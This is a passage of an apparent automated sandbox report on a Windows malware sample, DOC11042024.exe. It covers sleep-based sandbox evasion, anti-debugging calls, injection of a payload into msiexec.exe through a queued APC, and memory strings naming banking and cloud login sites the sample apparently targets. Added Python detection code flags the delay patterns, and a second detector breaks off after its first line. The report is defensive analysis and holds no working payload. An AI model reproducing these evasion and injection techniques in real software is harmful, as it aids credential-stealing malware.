          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -594562s >= -30000s
          Source: C:\Users\user\Desktop\DOC11042024.exe Code function: 0_2_00402706 FindFirstFileW, 0_2_00402706
          Source: C:\Users\user\Desktop\DOC11042024.exe Code function: 0_2_004061E5 FindFirstFileW,FindClose, 0_2_004061E5
          Source: C:\Users\user\Desktop\DOC11042024.exe Code function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405731
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599890
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599781
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599670
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599562
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599452
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599344
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599234
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599124
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599016
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598906
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598797
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598687
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598578
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598469
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598344
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598234
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598125
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598015
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597906
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597797
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597687
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597578
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597467
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597359
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597250
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597141Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595543Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595328Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594562Jump to behavior
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: msiexec.exe, 00000005.00000003.2697286494.0000000006227000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3269852832.0000000006227000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWq
Source: msiexec.exe, 00000005.00000002.3269852832.00000000061CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2697286494.00000000061F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2697286494.0000000006227000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3269852832.0000000006227000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\DOC11042024.exe | API call chain: ExitProcess graph end node graph_0-3705
Source: C:\Users\user\Desktop\DOC11042024.exe | API call chain: ExitProcess graph end node graph_0-3699
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
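The thread-delay rows above show two distinct patterns: both powershell.exe and msiexec.exe request a delay of 922337203685477 ms, which is .NET's TimeSpan.MaxValue expressed in milliseconds (Ticks // 10000) and therefore an effectively infinite wait, and msiexec.exe issues a run of requests starting at 600000 ms that steps down by roughly 110 ms each time. The following is an added example written for this page, not code from the sample or from Joe Sandbox: it groups such delay events per process and flags both patterns. The event schema (image, pid, delay_ms), the 3-minute threshold and the process IDs other than 1128 are assumptions.

```python
"""Added example (editor-written, not from the sample or Joe Sandbox):
summarise per-process sleep requests and flag infinite waits, long total
sleep, and the countdown shape seen in the msiexec.exe delay rows."""
from collections import defaultdict

# .NET TimeSpan.MaxValue in whole milliseconds (Ticks // 10_000): the value a
# managed thread passes down when it waits with an effectively infinite timeout.
DOTNET_TIMESPAN_MAX_MS = 922_337_203_685_477

# Constructed events echoing the values listed above; PIDs other than 1128 are made up.
SAMPLE_EVENTS = [
    {"image": "powershell.exe", "pid": 4200, "delay_ms": 922_337_203_685_477},
    {"image": "msiexec.exe", "pid": 1128, "delay_ms": 922_337_203_685_477},
    {"image": "msiexec.exe", "pid": 1128, "delay_ms": 600_000},
    {"image": "msiexec.exe", "pid": 1128, "delay_ms": 599_890},
    {"image": "msiexec.exe", "pid": 1128, "delay_ms": 599_781},
    {"image": "msiexec.exe", "pid": 1128, "delay_ms": 599_670},
    {"image": "msiexec.exe", "pid": 1128, "delay_ms": 599_562},
    {"image": "explorer.exe", "pid": 3000, "delay_ms": 100},
    {"image": "explorer.exe", "pid": 3000, "delay_ms": 250},
]


def is_countdown(values, min_len=5):
    """True when successive finite delays step down by a small, roughly
    constant amount.  That shape is consistent with a sleep that returns
    early (sandboxes commonly shorten sleeps) while the code keeps
    re-requesting the time remaining until its original deadline, which is
    what 600000 -> 599890 -> 599781 -> ... looks like."""
    if len(values) < min_len:
        return False
    steps = [a - b for a, b in zip(values, values[1:])]
    return all(s > 0 for s in steps) and max(steps) <= 2 * min(steps)


def summarize_delays(events, threshold_ms=180_000):
    """Group delay requests by process image and return a summary for every
    process that either asked for an infinite wait or for more than
    threshold_ms of sleep in total (default: three minutes)."""
    by_image = defaultdict(list)
    for ev in events:                    # events are assumed to be in time order
        by_image[ev["image"]].append(ev["delay_ms"])

    flagged = {}
    for image, delays in by_image.items():
        finite = [d for d in delays if d < DOTNET_TIMESPAN_MAX_MS]
        infinite_waits = len(delays) - len(finite)
        total = sum(finite)
        if infinite_waits == 0 and total < threshold_ms:
            continue
        flagged[image] = {
            "requests": len(delays),
            "infinite_waits": infinite_waits,
            "total_finite_ms": total,
            "countdown": is_countdown(finite),
        }
    return flagged


if __name__ == "__main__":
    for image, summary in summarize_delays(SAMPLE_EVENTS).items():
        print(image, summary)
```

An infinite wait on its own is not evasion; a .NET program that blocks a thread on a handle with no timeout produces the same value, which is why the summary reports it separately from the finite total and the countdown flag rather than folding all three into one score.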

Anti Debugging

Source: C:\Windows\SysWOW64\msiexec.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09040000 LdrInitializeThunk, 2_2_09040000
Source: C:\Users\user\Desktop\DOC11042024.exe | Code function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_0040620C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\DOC11042024.exe | Code function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405EC4
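The four rows at the top of the HIPS / PFW / Operating System Protection Evasion section are the Early Bird sequence in order: powershell.exe creates msiexec.exe, writes into it at base 0x3C30000, queues an APC on one of its threads and resumes it, so the payload runs from the APC before the child's own entry point. The Anti Debugging section then shows the payload inside msiexec.exe setting HideFromDebugger on a thread and querying the process DebugPort. The following is an added example written for this page, not code from the sample or from Joe Sandbox, that correlates both patterns over a constructed API-call trace. The trace schema (pid, image, api, args) and every PID/TID other than msiexec.exe's 1128 are assumptions; the information-class values are the documented Windows constants.

```python
"""Added example (editor-written, not from the sample or Joe Sandbox):
find the Early Bird APC-injection chain and the two anti-debug calls in a
constructed API-call trace."""

CREATE_SUSPENDED = 0x00000004      # CreateProcess* dwCreationFlags bit
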